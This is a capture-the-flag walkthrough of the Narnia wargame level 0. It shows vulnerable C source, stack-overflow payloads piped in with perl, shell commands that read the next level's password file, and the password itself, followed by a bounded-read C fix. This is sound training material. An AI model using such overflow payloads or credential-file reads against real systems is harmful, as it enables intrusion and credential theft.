Narnia0 - narnia1

From JaxHax

Code

//narnia0@melinda:/narnia$ cat narnia0.c
/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.
 
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
 
    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/
#include <stdio.h>
#include <stdlib.h>
 
int main(){
	long val=0x41414141;
	char buf[20];
 
	printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
	printf("Here is your chance: ");
	scanf("%24s",&buf);
 
	printf("buf: %s\n",buf);
	printf("val: 0x%08x\n",val);
 
	if(val==0xdeadbeef)
		system("/bin/sh");
	else {
		printf("WAY OFF!!!!\n");
		exit(1);
	}
 
	return 0;
}


Solution

First let's give it a test run.

narnia0@melinda:/narnia$ ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: test
buf: test
val: 0x41414141
WAY OFF!!!!


This appears to be a simple stack buffer overflow. The most awkward part of exploiting it is that the program reads its input from STDIN rather than taking the payload as an argv argument. The first thing we need to do is work out how many bytes are needed to reach val. Our buffer is 20 bytes, so let's try 20 + 4.

narnia0@melinda:/narnia$ perl -e 'print "A"x20; print "BBBB";' | ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: AAAAAAAAAAAAAAAAAAAABBBB
val: 0x42424242
WAY OFF!!!!
narnia0@melinda:/narnia$


Bingo! That's exactly what we need to overflow val: it now equals 0x42424242, which is "BBBB". Now we can make it equal 0xdeadbeef. The bytes have to be written in little-endian order, so basically backwards.

narnia0@melinda:/narnia$ perl -e 'print "A"x20; print "\xef\xbe\xad\xde";' | ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ
val: 0xdeadbeef
narnia0@melinda:/narnia$


This does what we need, but doesn't give us our shell... /bin/sh is started, but its stdin is the same pipe we wrote the payload into, which has already hit EOF, so the shell exits straight away. So we will feed the commands inline instead: first the overflow, then our commands.

narnia0@melinda:/narnia$ ((perl -e 'print "A"x20; print "\xef\xbe\xad\xde";'; exit;); echo whoami) | ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ
val: 0xdeadbeef
narnia1


Works well enough... Now let's go after that password file...

narnia0@melinda:/narnia$ ((perl -e 'print "A"x20; print "\xef\xbe\xad\xde";'; exit;); echo cat /etc/narnia_pass/narnia1) | ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAᆳ
val: 0xdeadbeef
efeidiedae
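The root cause of the level is the mismatch between `char buf[20]` and `scanf("%24s", ...)`: the width exceeds the buffer by four bytes, exactly enough to reach val. As an added example (not the wargame's code), the C below is a bounded replacement for that read; `read_word`, `run_level` and `level_result` are names chosen here. It refuses a word that would not fit instead of truncating silently, and runs the page's 24-byte payload through to show that val is left untouched.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define BUF_LEN 20   /* same buffer size as the level */

/* Bounded replacement for the level's scanf("%24s", &buf): reads one
 * whitespace-delimited word into a `buf_len`-byte buffer. Returns 1 on
 * success, 0 on EOF/empty input, -1 if the word (plus NUL) would not fit. */
int read_word(FILE *in, char *buf, size_t buf_len) {
    char line[256];                                 /* raw line staging area */
    if (fgets(line, sizeof line, in) == NULL)
        return 0;
    if (strchr(line, '\n') == NULL && strlen(line) == sizeof line - 1)
        return -1;                                  /* line overran the staging area */
    size_t start = strspn(line, " \t\r\n");         /* skip leading blanks */
    size_t n = strcspn(line + start, " \t\r\n");    /* length of the word */
    if (n == 0)
        return 0;
    if (n >= buf_len)                               /* n chars + NUL must fit */
        return -1;
    memcpy(buf, line + start, n);
    buf[n] = '\0';
    return 1;
}

/* Outcome of one run: read_word's status, what val held afterwards, and what
 * was stored in buf (left empty when the input was rejected). */
typedef struct { int status; uint32_t val; char buf[BUF_LEN]; } level_result;

/* The level's locals (val beside a 20-byte buf) with the bounded read in
 * place; `input` is the text that would have arrived on stdin. */
level_result run_level(const char *input) {
    volatile uint32_t val = 0x41414141u;            /* the neighbour the overflow targets */
    char buf[BUF_LEN] = {0};
    level_result r = { 0, 0, {0} };
    FILE *in = fmemopen((void *)input, strlen(input), "r");
    if (in) { r.status = read_word(in, buf, sizeof buf); fclose(in); }
    memcpy(r.buf, buf, BUF_LEN);
    r.val = val;
    return r;
}

int main(void) {
    /* The page's 24-byte payload: 20 x 'A' then 0xdeadbeef in little-endian. */
    level_result r = run_level("AAAAAAAAAAAAAAAAAAAA\xef\xbe\xad\xde\n");
    printf("status=%d val=0x%08x buf=\"%s\"\n", r.status, r.val, r.buf);
    return 0;   /* prints: status=-1 val=0x41414141 buf="" */
}
```

The same fix in the original source would be `scanf("%19s", buf)`: the width must be one less than the buffer size to leave room for the terminating NUL.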